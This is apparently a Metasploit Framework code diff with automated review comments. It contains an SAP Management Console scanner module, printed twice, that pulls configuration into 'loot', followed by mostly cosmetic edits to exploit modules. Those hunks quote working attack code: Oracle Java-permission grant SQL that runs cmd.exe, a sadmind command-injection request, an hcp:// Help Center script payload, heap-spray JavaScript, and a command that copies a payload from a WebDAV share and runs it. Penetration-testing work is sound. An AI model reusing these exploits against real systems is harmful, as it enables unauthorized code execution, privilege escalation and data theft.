'uri' => "/#{datastore['URI']}",
'method' => 'GET',
'headers' =>
{
'User-Agent' => datastore['UserAgent']
}
}, 25)
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
return
end
getprocparam(ip)
end
def getprocparam(rhost)
verbose = datastore['VERBOSE']
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'
sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
ns1 = 'ns1:GetProcessParameter'
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi
data << '" xmlns:xs="' + xs + '">' + "\r\n"
data << '<SOAP-ENV:Header>' + "\r\n"
data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
data << '<enableSession>true</enableSession>' + "\r\n"
data << '</sapsess:Session>' + "\r\n"
data << '</SOAP-ENV:Header>' + "\r\n"
data << '<SOAP-ENV:Body>' + "\r\n"
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"></' + ns1 + '>' + "\r\n"
data << '</SOAP-ENV:Body>' + "\r\n"
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
begin
res = send_request_raw({
'uri' => "/#{datastore['URI']}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '""',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 30)
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
return
end
if res.code == 200
case res.body
when nil
# Nothing
when /<parameter>(.*)<\/parameter>/i
body = []
body = res.body
success = true
end
elsif res.code == 500
case res.body
when /<faultstring>(.*)<\/faultstring>/i
faultcode = $1.strip
fault = true
end
else
print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.")
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
return
end
if success
#Only stoor loot if MATCH is not selected
if datastore['MATCH'].empty?
print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot")
store_loot(
"sap.getprocessparameters",
"text/xml",
rhost,
res.body,
".xml"
)
else
name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n'])
print_status("[SAP] Regex match selected, skipping loot storage")
print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}")
saptbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "[SAP] Process Parameters",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
[
"Name",
"Description",
"Value"
])
xmldata = REXML::Document.new(body)
xmlpath = '/SOAP-ENV:Envelope/SOAP-ENV:Body/'
xmlpath << '/SAPControl:GetProcessParameterResponse'
xmlpath << '/parameter/item'
xmldata.elements.each(xmlpath) do | ele |
if not datastore['MATCH'].empty? and ele.elements["name"].text.match(/#{name_match}/)
name = ele.elements["name"].text if not ele.elements["name"].nil?
desc = ele.elements["description"].text if not ele.elements["description"].nil?
desc = '' if desc.nil?
val = ele.elements["value"].text if not ele.elements["value"].nil?
val = '' if val.nil?
saptbl << [ name, desc, val ]
end
end
print_status("[SAP] Process Parameter Results for #{name_match}\n #{saptbl.to_s}") if not saptbl.to_s.empty?
end
return
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return
else
# Something has gone horribly wrong
print_error("#{rhost}:#{rport} [SAP] failed to request environment")
return
end
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SAP Management Console Get Process Parameters',
'Version' => '$Revision$',
'Description' => %q{
This module simply attempts to output a SAP process parameters and
configuration settings through the SAP Management Console SOAP Interface.
},
'References' =>
[
# General
[ 'URL', 'http://blog.c22.cc' ]
],
'Author' => [ 'Chris John Riley' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(50013),
OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
OptString.new('MATCH', [false, 'Display matches e.g login/', '']),
], self.class)
register_autofilter_ports([ 50013 ])
deregister_options('RHOST')
end
def rport
datastore['RPORT']
end
def run_host(ip)
res = send_request_cgi({
'uri' => "/#{datastore['URI']}",
'method' => 'GET',
'headers' =>
{
'User-Agent' => datastore['UserAgent']
}
}, 25)
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
return
end
getprocparam(ip)
end
def getprocparam(rhost)
verbose = datastore['VERBOSE']
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'
sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
ns1 = 'ns1:GetProcessParameter'
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi
data << '" xmlns:xs="' + xs + '">' + "\r\n"
data << '<SOAP-ENV:Header>' + "\r\n"
data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
data << '<enableSession>true</enableSession>' + "\r\n"
data << '</sapsess:Session>' + "\r\n"
data << '</SOAP-ENV:Header>' + "\r\n"
data << '<SOAP-ENV:Body>' + "\r\n"
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"></' + ns1 + '>' + "\r\n"
data << '</SOAP-ENV:Body>' + "\r\n"
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
begin
res = send_request_raw({
'uri' => "/#{datastore['URI']}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '""',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 30)
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
return
end
if res.code == 200
case res.body
when nil
# Nothing
when /<parameter>(.*)<\/parameter>/i
body = []
body = res.body
success = true
end
elsif res.code == 500
case res.body
when /<faultstring>(.*)<\/faultstring>/i
faultcode = $1.strip
fault = true
end
else
print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.")
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
return
end
if success
#Only stoor loot if MATCH is not selected
if datastore['MATCH'].empty?
print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot")
store_loot(
"sap.getprocessparameters",
"text/xml",
rhost,
res.body,
".xml"
)
else
name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n'])
print_status("[SAP] Regex match selected, skipping loot storage")
print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}")
saptbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "[SAP] Process Parameters",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
[
"Name",
"Description",
"Value"
])
xmldata = REXML::Document.new(body)
xmlpath = '/SOAP-ENV:Envelope/SOAP-ENV:Body/'
xmlpath << '/SAPControl:GetProcessParameterResponse'
xmlpath << '/parameter/item'
xmldata.elements.each(xmlpath) do | ele |
if not datastore['MATCH'].empty? and ele.elements["name"].text.match(/#{name_match}/)
name = ele.elements["name"].text if not ele.elements["name"].nil?
desc = ele.elements["description"].text if not ele.elements["description"].nil?
desc = '' if desc.nil?
val = ele.elements["value"].text if not ele.elements["value"].nil?
val = '' if val.nil?
saptbl << [ name, desc, val ]
end
end
print_status("[SAP] Process Parameter Results for #{name_match}\n #{saptbl.to_s}") if not saptbl.to_s.empty?
end
return
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return
else
# Something has gone horribly wrong
print_error("#{rhost}:#{rport} [SAP] failed to request environment")
return
end
end
end
+2 -2
@@ -1,5 +1,5 @@
##
# $Id: call_scanner.rb 13183 2011-07-15 15:33:35Z egypt $
# $Id$
##
##
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Telephone Line Voice Scanner',
'Version' => '$Revision: 13183 $',
'Version' => '$Revision$',
'Description' => 'This module dials a range of phone numbers and records audio from each answered call',
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
+6 -4
@@ -61,10 +61,12 @@ class Metasploit3 < Msf::Auxiliary
register_advanced_options(
[
OptBool.new("SMB_EXTENDED_SECURITY", [ true, "Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification", false ]),
OptBool.new("NTLM_UseNTLM2_session", [ true, "activate the 'Negotiate NTLM2 key' flag in ntlm authentification when smb extended security negociation is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)", false ]),
OptBool.new("USE_GSS_NEGOCIATION", [ true, "Send an gss_security blob in smb_negociate response when smb extended security is set, when this flag is not set windows will respond without gss encapsulation, ubuntu will still use gss", true ]),
OptString.new('DOMAIN_NAME', [ true, "The domain name used during smb exchange with smb extended security set ", "anonymous" ])
OptBool.new("SMB_EXTENDED_SECURITY", [ true, "Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification", false ]),
OptBool.new("NTLM_UseNTLM2_session", [ true, "Activate the 'negociate NTLM2 key' flag in NTLM authentication. " +
"When SMB extended security negociation is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)", false ]),
OptBool.new("USE_GSS_NEGOCIATION", [ true, "Send a gss_security blob in smb_negociate response when SMB extended security is set. " +
"When this flag is not set, Windows will respond without gss encapsulation, Ubuntu will still use gss.", true ]),
OptString.new('DOMAIN_NAME', [ true, "The domain name used during smb exchange with smb extended security set ", "anonymous" ])
], self.class)
end
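Review bot: The rewritten description on the `NTLM_UseNTLM2_session` line changes the flag's name from 'Negotiate NTLM2 key' to 'negociate NTLM2 key', which is a misspelling of the name the flag is usually displayed under and makes the option harder to search for; `"Activate the 'Negotiate NTLM2 Key' flag in NTLM authentication. "` keeps the free text aligned with the protocol term. The "negociation" spelling in the other two descriptions is the same slip, but `USE_GSS_NEGOCIATION` itself is an option name and must stay as it is so existing resource scripts keep working.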
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
<content><![CDATA[#{content}]]></content>
<!-- The XSLT stylesheet header, including the "sx" extension -->
<xsl:stylesheet id="fragment" version="1.0"
<xsl:stylesheet id="fragment" version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:sx="http://icl.com/saxon"
extension-element-prefixes="sx"
+3 -3
@@ -98,14 +98,14 @@ class Metasploit3 < Msf::Auxiliary
end
rescue EOFError
rescue ::Exception => e
print_error("AIRPWN: failed to parse response file " \
print_error("AIRPWN: failed to parse response file " +
"#{r['file']}, #{e.class} #{e} #{e.backtrace}")
end
end
else
if r["file"] then
print_error "AIRPWN: Both 'response' and 'file' in yaml config, " \
"defaulting to 'response'"
print_error "AIRPWN: Both 'response' and 'file' in yaml config, " +
"defaulting to 'response'"
end
r["txresponse"] = r["response"]
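Review bot: The rewritten `print_error` on the parse-failure path sits inside `rescue ::Exception => e`, which also catches `Interrupt` and `SystemExit`, so a Ctrl-C while a response file is being parsed is reported as a parse error instead of stopping the module. Since the pass already touches this line, narrowing the handler to `rescue ::StandardError => e` is a one-line change with identical reporting for real parse errors. The empty `rescue EOFError` just above swallows that case silently; a short comment on why an EOF is ignored here would help the next reader. The enclosing loop starts outside the hunk.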
@@ -47,10 +47,16 @@ class Metasploit3 < Msf::Auxiliary
name = Rex::Text.rand_text_alpha(rand(10) + 1)
package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','"
package1 << "<" << "<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
"CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','"
package1 << "<" << "<ALL FILES>>','execute','ENABLED' from dual;" +
"BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
"CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;" +
"BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
"CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;" +
"BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual"
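Review bot: The `package1 << "<" << "<ALL FILES>>…" + "BEGIN …"` statement only produces the intended string because `+` binds tighter than `<<`, so the two literals are joined first and then appended; a reader, or a later edit that inserts a variable in the middle, can easily end up with a different grouping. Using one operator per statement avoids relying on that: `package1 << "<" << "<ALL FILES>>','execute','ENABLED' from dual;"` followed by `package1 << "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"`. The `package2` and `package3` assignments use `+` throughout and are fine as written.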
+2 -2
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
def create_page
# Webpage Title
title = "vSploit PII Webserver"
sheep =<<EOF
sheep = <<-EOS
__________
< baaaaah! >
---------
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
// ( // /
~~~~~ ~~~~
EOF
EOS
page = ""
page << "<html>\n<head>\n"
@@ -79,7 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote
[
OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]),
OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]),
OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. " +
"ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). " +
"If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " +
"(these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]),
OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
], self.class)
+10 -10
@@ -291,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request(path, @verbs['POST'], session, data, ctype)
if (not res)
print_error("Undeployment failed on #{path} - No Response")
else
else
if res.code < 200 or res.code >= 300
print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}")
end
@@ -333,10 +333,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
#
# Return the formatted version of the POST data
#
def format_2_x_war(boundary,name,value=nil, war=nil)
data = ''
# Return the formatted version of the POST data
#
def format_2_x_war(boundary,name,value=nil, war=nil)
data = ''
data << boundary
data << "\r\nContent-Disposition: form-data; name=\"form:title:sheet1:section1:prop1:fileupload\"; "
@@ -344,8 +344,8 @@ class Metasploit3 < Msf::Exploit::Remote
data << war
data << "\r\n"
return data
end
return data
end
#
# Return the formatted version of the POST data
@@ -555,8 +555,8 @@ class Metasploit3 < Msf::Exploit::Remote
ctype = "multipart/form-data; boundary=#{boundary}"
elsif version == '2.x' or version == '9.x'
ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
typefield = ''
start = ''
typefield = ''
start = ''
else
ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
end
@@ -687,7 +687,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
end
end
end
if success == true
@@ -126,8 +126,8 @@ class Metasploit3 < Msf::Exploit::Remote
header =
XDR.encode(0) * 7 +
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
hostname, 'system', rand_text_alpha(16))
body =
@@ -106,8 +106,8 @@ class Metasploit3 < Msf::Exploit::Remote
def sadmind_request(host, command)
header =
XDR.encode(0) * 7 +
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
host, 'system', '../../../bin/sh')
body =
@@ -86,7 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' +
'Support for chunked encoded requests was added to PHP on 12/15/2005. ' +
'Try disabling HTTP::chunked and trying again.'
end
end
end
@@ -91,7 +91,9 @@ class Metasploit3 < Msf::Exploit::Remote
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' +
'Support for chunked encoded requests was added to PHP on 12/15/2005. ' +
'Try disabling HTTP::chunked and trying again.'
end
end
end
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# build the exploit
content = %Q|
content = <<-EOS
<html>
<head>
<title>msf</title>
@@ -112,12 +112,13 @@ ID=Abysssec width=600 height=430 VIEWASTEXT>
<param name=swStretchStyle value=fill>
<param name=PlayerVersion value=11>
<PARAM NAME=bgColor VALUE=#FFFFFF>
<embed src="#{dirname}.DIR" bgColor=#FFFFFF width=600 height=430 swRemote="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' " swStretchStyle=fill
<embed src="#{dirname}.DIR" bgColor=#FFFFFF width=600 height=430 swRemote="swSaveEnabled='true' swVolume='true' swRestart='true'
swPausePlay='true' swFastForward='true' swContextMenu='true' " swStretchStyle=fill
type="application/x-director" PlayerVersion=11 pluginspage="http://www.macromedia.com/shockwave/download/"></embed>
</object>
</body>
</html>
|
EOS
# Transmit the response to the client
path = request.uri
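Review bot: Wrapping the `<embed>` line after `swRestart='true'` places the line break, and whatever indentation follows it, inside the quoted `swRemote` attribute value, so the markup sent to the client is no longer the old single-line form; the `%Q`→`<<-EOS` conversion itself only drops the leading newline. The value is a space-separated list, so a newline inside it is probably harmless, but it is a content change rather than a formatting one and is worth a quick check against the target player. If the wrap is kept, breaking between attributes (before `swRemote=`) rather than inside the value leaves the served HTML unchanged.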
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
'<param name="vip" value="255.255.255.255">'+
'</object>';
} else {
alert('Internal Error');
alert('Internal Error');
}
|
# the ret slide gets executed via call [esi+45b]
@@ -277,7 +277,7 @@ else {
custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate()
end
return %Q|
return <<-EOS
<html>
<body>
<div style="visibility:hidden;width:0px;height:0px">
@@ -291,7 +291,7 @@ else {
<script type="text/javascript">
#{custom_js}
</script></body></html>
|
EOS
end
@@ -95,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote
))
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
@@ -115,7 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
html = %Q|<html>
html = <<-EOS
<html>
<head>
<script language="javascript">
function forward() {
@@ -132,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
<object>
</body>
</html>
|
EOS
@state[token] = :start
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
@@ -172,6 +173,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport} token=#{@state[token]}...")
html = ""
data = "==gPOFEUT9CPK4DVYVEV9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQ" +
"EBiTBB1U8ogPM1EVI1zUBRVQNJ1TGFEVBREID1DRMZUQUFERgk0I9MkUTFEVBREI" +
"OFEUTxjC+QFWFRVPTFEVB1kUPZUQUFERgMUPExkRBRVQEBSSj0zQSNVQUFERg4UQ" +
"QNFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U" +
"8ogPM1EWvwjPJ1DRJBCTNhFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREI" +
"JNSPDJ1UBRVQEBiVJREP"
data = data.reverse.unpack("m*")[0]
#
@@ -180,7 +188,6 @@ class Metasploit3 < Msf::Exploit::Remote
if(@state[token] == :dll)
addr_a,addr_b = [vaddr].pack("V").unpack("v*").map{|v| "&##{v};" }
data = "==gPOFEUT9CPK4DVYVEV9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U8ogPM1EVI1zUBRVQNJ1TGFEVBREID1DRMZUQUFERgk0I9MkUTFEVBREIOFEUTxjC+QFWFRVPTFEVB1kUPZUQUFERgMUPExkRBRVQEBSSj0zQSNVQUFERg4UQQNFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U8ogPM1EWvwjPJ1DRJBCTNhFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiVJREP".reverse.unpack("m*")[0]
bxml = Rex::Text.to_hex(%Q|
<XML ID=I>
<X>
@@ -235,7 +242,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Heap spray mode")
addr_a,addr_b = [0x0c0c0c0c].pack("V").unpack("v*").map{|v| "&##{v};" }
data = "==gPOFEUT9CPK4DVYVEV9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U8ogPM1EVI1zUBRVQNJ1TGFEVBREID1DRMZUQUFERgk0I9MkUTFEVBREIOFEUTxjC+QFWFRVPTFEVB1kUPZUQUFERgMUPExkRBRVQEBSSj0zQSNVQUFERg4UQQNFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U8ogPM1EWvwjPJ1DRJBCTNhFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiVJREP".reverse.unpack("m*")[0]
bxml = Rex::Text.to_hex(%Q|
<XML ID=I>
<X>
@@ -268,7 +274,8 @@ class Metasploit3 < Msf::Exploit::Remote
rand_html = rand_text_english(rand(400) + 500)
html = %Q|<html>
html = <<-EOS
<html>
<head>
<script>
var #{var_memory} = new Array();
@@ -297,7 +304,8 @@ class Metasploit3 < Msf::Exploit::Remote
#{rand_html}
</body>
</html>
|
EOS
end
# Transmit the compressed response to the client
@@ -115,7 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote
var_start = rand_text_alpha(rand(100) + 1)
rand_html = rand_text_english(rand(400) + 500)
js = %Q|var #{var_element} = "COMMENT";
js = <<-EOS
var #{var_element} = "COMMENT";
var #{var_el_array} = new Array();
for (i = 0; i < 1300; i++)
{
@@ -148,7 +149,7 @@ for (i = 0; i < #{var_el_array}.length; i++)
}
var t = #{var_event}.srcElement;
}
|
EOS
js_encoded = encrypt_js(js, @javascript_encode_key)
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
@@ -151,7 +151,9 @@ class Metasploit3 < Msf::Exploit::Remote
# iframe request inbound from either WMP or IE7
if request.uri.match(/#{@start_help}/)
help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
help_html = <<-EOS
<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">
EOS
rand_vbs = rand_text_alpha(rand(2)+1) + ".vbs"
copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\#{@payload}^
